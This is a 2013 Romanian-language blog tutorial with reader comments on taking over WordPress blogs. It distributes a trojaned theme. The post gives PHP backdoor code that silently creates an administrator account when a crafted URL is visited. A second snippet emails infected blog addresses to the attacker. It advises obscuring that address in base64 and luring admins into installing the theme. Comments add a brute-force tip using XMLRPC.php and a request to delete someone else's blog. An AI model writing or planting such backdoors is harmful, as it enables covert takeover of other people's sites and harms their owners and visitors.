Friday, July 26, 2013

Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale

INTRODUCTION


Sună foarte frumos şi defapt este foarte uşor. Tutorialul ce l-am creat astăzi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress şi anume, cum putem să luăm acces la un blog cu eleganţă şi fără a lăsa urme ca să îşi dea seama proprietarul.

Să dăm un mic exemplu. Domnul Gheorghe vrea să spargă cât mai multe blog-uri de pe o anumită nişă web. Se gândeşte cum să facă un lucru de genul ăsta. Noroc că Gheorghe este foarte inventiv şi i-a venit în minte să creeze şi să "infecteze" o temă (theme) visuală.

Mulţi o să spuneţi că o să creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru că ar lăsa urme. Aşa că va adăuga în temă un cod PHP care să adauge automat un nou cont cu drepturi de administrator.

THE CODE

add_action('wp_head', 'wp_wordpress');
      function wp_wordpress() {
                    if ($_GET['p'] == '1') {
                           require('wp-includes/registration.php');
                    if (!username_exists('wordpress')) {
      $user_id = wp_create_user('Guest', 'password');
      $user = new WP_User($user_id);
      $user->set_role('administrator');
        }
    }
} 
Ce face codul de mai sus? Dacă este adăugat spre exemplu în templates.php (am precizat această filă deoarece este executată automat când accesăm index-ul unui blog), oricine va intra pe următorul link: http://pentesting/wp/?p=1 (primul articol de pe blog) va crea în baza de date un nou cont cu drepturi de administrator şi cu numele: Guest şi parola password. O remarcă importantă ar fi aceea că tema instalată trebuie să fie şi cea activă.

Legat de ingineria socială vă descurcaţi voi că sunteţi baieţi isteţi cu mult timp liber. Puteţi posta online undeva tema şi să adaugaţi undeva anumite cuvinte pentru a crea un dork să puteţi găsi blog-urile infectate. Sau îl puteţi manipula chiar pe administrator să instaleze tema.

Ok. Ca să fie totul complet şi pentru că nu am fost mulţumit parcă dacă nu ajutam şi cu partea asta, adică cea în care sunteţi informaţi cu ce blog a fost infectat, pe email.

THE CODE

<? add_action('wp_head','wp_wordpressmail');
           function wp_wordpressmail(){
                     if ( is_user_logged_in() ) {
                     if(!username_exists('wordpress')){
     $addr='TinKode@domain.tld'; # Aici puneţi adresa voastră de email
     $judul='WP URL';
                   wp_mail($addr,$judul,get_bloginfo('wpurl'));
        }
     }
  }
?> 

Să vă bucuraţi de metodă. Şi ca să nu vă dea de gol adresa de mail, puteţi să o encriptaţi în base64.

Să nu uitaţi să stergeţi tag-urile PHP când adăugaţi în filă.

THE END

Share on:


Tags: , , , , , ,  

42 comentarii:

Darky said...

Mulțumiri din partea muritorilor de rând!

Unknown said...

TinKode,ce sistem de operare foloseai cand spargeai servere?

ROLDIRO said...

beni zoldos :))) LINUX PRIETENE.

Anonymous said...

Bull shit fa tutorial mah

Anonymous said...

"encriptaţi în base64" - hacker language?! :)

Unknown said...

In general toti hackerii folosesc Linux.

Unknown said...

CIOCAN ,DALTA :)))

Anonymous said...

TinKode ai un id de mess sau gmail ? vreau sa-ti propun ceva

Claudiu said...

Cu asta poti fura steam-uri oare :))? Daca formez o pagina php personalizata si pune botu si se logheaza oare ar merge ce zici :> ?

Anonymous said...

Asa cum a spus intr-un interviu d ela proTV foloseste sistem d eoperare Linus sau Win7... bafta in continuare si incepe sami placa chestile astea cum ai facut Tinkode o sa incerc si eu ceva ...

Unknown said...

salut,cum pot lua legatura cu tine?
o adresa de mail ceva?

Unknown said...

Cum pot lua legatura cu tine? un email ceva?

Anonymous said...

backtrack 5

Anonymous said...

ce programe imi trebuie pentru a face asta? si..cum adica? am programul respectiv si fac o tema(fundal) de blog care are un fel de virusi si eu ii pot ,,infecta'' blogul?? pls help me TINKODE !!

Unknown said...

Se foloseste de asazisul keylogger , o metoda clasica si eficienta.. dar windows 7 contine windows defender care il gaseste dupa o scanare completa a sistemului ...

Anonymous said...

Prietene, daca vrei sa spargi site-uri prin inginerie sociala si nu esti in stare sa urmezi niste instructiuni foarte simplu e timpul sa iti iei calculatorul, sa-l duci in padure, sa-i dai foc, sa stergi urmele si sa te duci inapoi acasa.

Unknown said...

un exista programe pt a face asta! iti trebuie cunostinte de PHP si un pic de web design. crezi k cu un click si un generator ai sa spargi siteuri? lol

Unknown said...

ce keyloger ma? lol voi kiar vreti sa vi sa raspunda la intrebarile astea stupide? stii ce e un keyloger?,ai creat vreodata unu?stii vreun limbaj d programmare?tolti vreti sa deveniti hakeri dar unici unu nu stie un pic de c++,PHP,java etc look noobs.

Anonymous said...

Un prograam de pentesting foarte bun...Kali linux sau Backtrack5 R3 recomand Kali linux pentru cei care au habar ;)

Crs said...

In ce program scriptezi ? Adica in ce program scri chestile astea

Anonymous said...

:))

Unknown said...

Multumim TinKode , chiar aveam nevoie de un tutorial de genu:) , bafta frate:* si daca mai ai timp nu ne ar deranja sa mai postezi cate ceva:D:D:D

Anonymous said...

NATIUNE DE RAHAT !
In loc sa invatati ceva util care sa deserveasca societatii si sa contribuiti la prosperitatea acesteia, lasand intiparit numele vostru acolo undeva, mandrindu-se de acesta, parintii, fratii, nepotii sau copii vostri, va ocupati de cel mai josnic mod de a viola proprietatea privata. RUSINE !!!

Anonymous said...

Ba frate lasa`te dute arunca`te in balta ca e cel mai usor si mai simplu fa drq un keylogger si ai terminat wow... mare cacat ce faci tu aici o.O si asa vezi chiar tot ce face toate conturile te chinui asa faci pur si simplu keylogger si ii zici ca e nush ce... :| te complici atat , o.O lasa`te.

Anonymous said...

De unde ai reusit sa inveti toate astea ?

CaddyCod said...

nu merge linkul :(

CaddyCod said...

nu pot sa intru pe link .... help :D

Anonymous said...

Ca tine vreau sa fiu cand o sa fiu mare !

Unknown said...

Ma oameni buni credeti ca numai asta este singura metoda de a "sparge" un site pe Wordpress? :)) da este una din multiplele metode. Mai exista si BruteForce...mda..unii o sa spuneti ca dureaza prea mult insa este destul de eficienta si nu lasa urme mai ales daca folosesti OS bazat pe Linux (nu dau exemplu de distributii pentru ca stiti deja). Asa ca mai ganditi-va si la alte metode nu numai la cea prezentata :)))) :))

Alin razvan said...

Habar nu aveti cate se pot face de pe un simplu sistem de operare cum este windows.

La linux treci cand ai de lucru in bash si alte cele ..

Alin razvan said...

Habar nu aveti cate se pot face de pe windows , linux iti trebuie daca ai treaba in Bash sau altceva, desi exista foarte multe alternative si pe windows , nu mai zic de faptul ca daca nu ai ca target servere web , windows-ul este cel mai folosit in ziua de azi pentru accesare mail, cpanel , whm etc ...

iar despre securizare web , am vazut mai sus ca intreba cineva , ar trebuii mai intai ca sa invete programare sa stie ce face codul si cum ruleaza .

Anonymous said...

au auzit si romanii de kali linux :))

Anonymous said...

Prietene ... tu vezi de salvarea societății de Rosia Montana etc. și lasă-ne pe noi sa facem ce știm mai bine ... ca iți garantez ca dam mai mult ajutor societății in 2 min si 10 click decât ar putea oferii 1 mil. de al de tine in 5-10 ani. P.S. Te anunț ca "opțiunea'' Anonymous pe care ai ales-o nu iti protejează total identitatea asa ca ai mare atenție la ce mai zici pe aici si pe cine mai critici sunt sigur ca unii abia așteaptă sa te lase o perioada fără net -_-

Anonymous said...

anon vorbesti de parca ai fii mare hacker tu......!nu te mai da ce nu esti.

Unknown said...

Probabil Back Track (o distributie Linux cu tot felul de tool-uri folosite pentru hacking).

Anonymous said...

cum pot sa shimb datele unui site?

Unknown said...

Nu sunt Hacker...nu ma consider unul ci doar am zis ca exista si alte metode de a sparge un site pe wordpress.... Keep KALM and love linux :P

Anonymous said...

...care urme sa le stearga? /var/log/secure.forest???:))

Vlad said...

Crede-ma ... lasa urme ... exista posibilitatea de a stoca IP-ul fiecarei persoane care incearca sa se logheze. Pe langa asta, e foarte simplu sa limitezi numarul de incercari de logare pe ora/zi, whatever, ceea ce face ca BruteForce-ul sa nu mai fie practic deloc...mai ales daca are o parola mai complexa decat 123456

TinKode said...

Perfect de acord că se salvează în loguri orice încercare a unuia ce face bruteforce. Dar dacă ne limităm la WordPress sau ceva similar, acea restricţie este egală cu 0 dacă te foloseşti să faci bruteforce prin XMLRPC.php, unde nu există vreo restricţie.

Anonymous said...

salut am o intrebare cum pot scoate comentariile de pe un blog wordpress fara user si fara parola nu injurati recunosc nu ma pricep la treburile astea cu php html si ce mai vorbeati voi mai sus dar am pe cineva care ma mananca de cu.....r pe un blog wordpress si vreau sa scot acele comentarii sau sa sterg blogul detot se poate face ceva fara user si parola

Chris Jordan said...

Since it is easy to setup and easy to use, it is possible to create static HTML files that are based on the dynamic WordPress blog. This cache plugin also automatically modifies the.htaccess file along with offering a cache timeout feature.tentų gamyba

Post a Comment